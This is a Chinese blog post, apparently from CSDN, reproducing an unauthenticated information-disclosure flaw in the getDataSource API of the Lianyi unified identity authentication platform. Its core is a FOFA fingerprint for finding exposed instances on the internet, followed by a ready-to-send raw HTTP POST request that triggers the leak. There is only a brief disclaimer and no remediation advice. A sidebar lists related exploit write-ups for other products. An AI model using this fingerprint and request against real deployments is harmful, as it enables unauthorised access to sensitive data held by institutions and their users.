【漏洞复现】联奕统一身份认证平台getDataSource存在信息泄露漏洞

已于 2024-03-28 17:27:16 修改
阅读量1.1k 收藏 3
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 网络安全
于 2024-03-28 17:26:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137118785
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

联奕统一身份认证平台 getDataSource 未授权访问,攻击者可通过此漏洞获取敏感信息。

二、影响版本

联奕统一身份认证平台

三、资产测绘

  • fofa:icon_hash="772658742"
  • 特征

image-20240326234635891

四、漏洞复现

POST /api/bd-mdp/serviceManager/outInterface/getDataSource HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Transfer-Encoding: chunked
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

0

image-20240326234137810

E_cho234
关注
专栏目录
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
qq_51577576的博客
09-12 1766
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1584
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
漏洞复现联奕统一身份认证平台getDataSource未授权访问漏洞
qq_34780861的博客
03-19 1108
联奕统一信息门户平台(LYASP_v3.0)定位于对数字校园中的信息和应用系统进行整合,统一控制用户对信息和应用系统的访问,利用统一身份认证系统,为用户提供一个单一的访问入口(SSO)。
web渗透测试----11、身份认证漏洞
七天
03-10 5461
文章目录一、什么是身份认证?1、身份认证三要素:2、身份认证和授权的区别:二、身份验证漏洞如何产生?三、身份认证常见的漏洞一、基于密码的登录漏洞1、密码破解2、用户名猜解3、用户名枚举4、目前防止暴力攻击的最常见方法是:二、双因子身份验证中的漏洞1、绕过双因子验证2、双因子验证逻辑错误3、暴力破解2FA验证码三、其他身份验证机制中的漏洞1、保持用户登录状态2、重置用户密码四、身份认证相关漏洞的防御 一、什么是身份认证身份认证是验证给定用户或客户端身份的过程。简单理解就是如何让别人相信你就是你。 1、
中国移动 禹路由存在敏感信息泄露漏洞
最新发布
2301_77012231的博客
09-18 241
中国移动 禹路由 simple-index.asp 存在未授权,可以查看wifi密码信息
用友 NC 敏感信息泄露
qq_36334672的博客
01-25 420
【代码】用友 NC 敏感信息泄露
身份验证系统遗漏:身份验证和授权系统的安全设置不足
ZOMO的博客
01-31 808
身份信息和用户数据往往具有敏感性并涉及到个人隐私保护,因此需要确保这些信息的完整性与保密性。当前很多企业的数据库可能未采取足够的加密技术,易受到黑客攻击和数据泄露的风险影响。另外,尽管许多公司会定期对这些数据进行备份以保证灾难恢复能力,但备份文件的有效期管理也需要重视起来以免旧数据的过期导致不必要的麻烦。通过对身份验证系统与授权过程的深入研究和分析我们发现了一些亟待解决的问题和挑战。只有在充分了解这些问题的基础上我们才能够找到有效的方法来解决它们从而为企业和用户提供更安全的网络环境。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 956
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞挖掘 | EDU拿敏感信息的骚思路
zkaqlaoniao的博客
08-16 667
在进行edu漏洞挖掘的时候,我们常常遇到统一认证平台,账号是学号,密码是身份证后6位(甚至是更复杂的密码),同时找到这两者的几率很小,所以我们把关注点放在微信小程序中,因为微信小程序存在一键授权登录,不需要本校学生的学号和密码(小部分),这里我们找学校的小程序,直接搜索大学,职业学院等字样
漏洞复现】泛微OA E-Cology WorkflowServiceXml RCE
alert['Hello World']
07-18 1929
泛微OA E-Cology 的 WorkflowServiceXml 存在命令执行漏洞,攻击者可以通过这个漏洞在服务器上执行任意命令,完全控制权,进行非法操作、窃取和篡改敏感数据,甚至完全接管服务器,给系统的安全性带来严重威胁。
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 2071
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞,能够获取服务器敏感文件。...
Apache Druid 命令执行漏洞复现(CVE-2021-25646)
千寻的博客
02-04 1989
学习笔记下载 https://download.csdn.net/download/qq_41901122/15051281 文章目录学习笔记下载漏洞编号漏洞描述影响版本环境搭建第一步 安装jdk8环境第二步 搭建Druid第三步 访问8888端口漏洞复现查找漏洞点方法一:DNS解析方法二:反弹shell修复建议摘抄 漏洞编号 CVE-2021-25646 发布时间:2021-01-29 漏洞等级:高 漏洞描述 Apache Druid 是一个分布式的数据处理系统。 Apache Druid包括执行
漏洞复现】EPON上行A8-C政企网关信息泄露漏洞
晚风不及你
02-05 1025
EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。
漏洞复现】海康威视-视频编码设备接入网关-userinfodata-信息泄露
知黑而守白
03-20 235
海康威视视频编码设备接入网关是一款集IP视频编码设备接入服务、视频转码服务、云台控制服务,权限管理、日志管理、设备资源及运维管理等功能于一体的电信级视频接入网关设备。海康威视-视频编码设备接入网关 userinfodata 接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取敏感信息
漏洞复现-Citrix 信息泄露漏洞分析(CVE-2023-4966)_cve-2023-4966 复现
heike_Ch的博客
08-22 417
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
【1day】蓝凌OA 某接口敏感信息泄露漏洞学习
记录并分享学习安全的知识点..
12-07 849
蓝凌OA 系统某接口存在敏感信息泄露漏洞,攻击者通过漏洞可以获取到大量用户的信息,包括姓名、性别、手机号等信息。通过实施日志记录、审计和监控机制,监控系统和应用程序的访问、操作和事件,及时发现异常行为和潜在的信息泄露风险。4、教育和培训员工有关信息安全的最佳实践,增强他们对信息保护的意识和责任感。提供培训和指导,教育员工如何正确处理和保护敏感信息,减少信息泄露的风险。对敏感信息进行加密存储和传输,确保数据在存储和传输过程中的安全性。只授权合法用户访问敏感信息,并限制敏感信息的传输和复制。
帮管家 CRM init 信息泄露漏洞(含批量验证poc)
weixin_43567873的博客
04-18 78
帮管家 CRM init 信息泄露漏洞(含批量验证poc)
华夏ERP信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-27 385
该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息
用友u9接口TransWebService存在信息泄露漏洞
jennycisp的博客
07-15 322
需要加入内部知识星球可点击上方链接,资源包含但不限于网上未公开的1day/0day漏洞2024 更新漏洞POC共950+2024最新SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。圈子里面资料价值至少在10K以上,目前星球内部主题600+,资源2000+,其他和网盘资源1w+并持续更新中!
getDataSource()
12-18
根据提供的引用内容,无法确定`getDataSource()`具体指的是哪个方法或类的方法。但是可以根据引用内容推测出一些相关信息。 根据引用中提到的`DynamicDatasourceHolder.setDataSource()`方法,可以猜测这是一个动态数据源的实现方式。在这种情况下,`getDataSource()`可能是一个用于获取当前数据源的方法。但是,具体实现方式需要查看代码才能确定。 根据引用中提到的动态数据源注解,可以猜测这是一种更加方便的动态数据源实现方式。在这种情况下,`getDataSource()`可能是一个用于获取当前数据源的方法。但是,具体实现方式需要查看代码才能确定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值